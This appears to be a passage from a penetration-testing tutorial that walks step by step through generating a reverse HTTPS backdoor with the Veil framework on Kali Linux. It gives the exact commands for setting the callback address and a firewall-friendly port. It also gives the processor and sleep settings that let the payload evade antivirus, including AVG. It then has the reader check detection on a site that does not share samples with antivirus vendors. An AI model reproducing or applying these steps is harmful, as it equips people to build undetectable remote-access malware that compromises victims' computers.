We're now going to use Veil to generate a backdoor. First, we'll run the list command. We'll type the use 1 command, as we want to use Evasion and press Enter, and, as we want to use the fifteenth payload, we'll run the use 15 command, as follows:
Using the following options, we're going to change the payload's IP LHOST to the IP address of the Kali machine we're using.
To get the IP address of our Kali machine, we have to run ifconfig. Split the screen by right-clicking and selecting Split Horizontally, and then run the command. As shown in the following screenshot, the Kali machine's IP address is 10.0.2.15, which is where we want the target computer's connection to return to once the backdoor has been executed:
To set LHOST as 10.0.2.15, write the set command followed by the option you want to change, as shown as follows:
set LHOST 10.0.2.15
We now need to change LPORT so that it's set to 8080. This port is also used by web servers, so will not appear suspicious and should still bypass firewalls. To set the correct port, input the set LPORT 8080 command, as shown in the following screenshot:
This process will bypass every antivirus program except AVG, according to experience. Antivirus programs work using a large database of signatures. These signatures correspond to files that contain harmful code, so if our file matches any value in a database, it will be flagged as a virus or as malware. Because of this, we need to make sure that our backdoor is as unique as possible so it can bypass every piece of antivirus software. Veil works hard by encrypting the backdoor, obfuscating it, and injecting it in memory so that it doesn't get detected, but this doesn't wash with AVG.
To ensure our backdoor can bypass AVG, we need to modify the minimum number of processors used by it—in this case, 1. To do this, use the following command:
set PROCESSORS 1
We will also modify the SLEEP option, which is the number of seconds a backdoor will wait before it executes the payload. To tell your backdoor to wait 6 seconds, use the following command:
set SLEEP 6
These changes are reflected in the following screenshot:
We are now going to generate the backdoor using the generate command, as shown as follows:
We now need to name our backdoor. Here, we're going to name it rev_https_8080. The following screenshot illustrates what we see once a backdoor is generated; this includes the module used by the backdoor, and where it's stored:
To test our backdoor, we're going to bypass Veil's checkvt command, which is not always accurate, and VirusTotal, which shares its results with antivirus software, and instead opt for the website NoDistribute, as shown in the following screenshot:
Now, click on Browse... and navigate to your file at /usr/share/veil-output/compiled, as shown as follows:
Once we have clicked Scan File, or View Previous Results, we can see that the file we uploaded has successfully bypassed all antivirus programs, as shown in the following screenshot:
Remember that Veil will work best when its kept up to date with the latest version. It's also worth noting that whether a backdoor goes undetected or not is often arbitrary—one backdoor we previously generated with no sleep setting was detected by antivirus software, as was one with a sleep time of 10 seconds. A backdoor set with a sleep time of 6 seconds, however, bypassed every program.
We recommend playing around with all the available options within a payload to find something that works for you.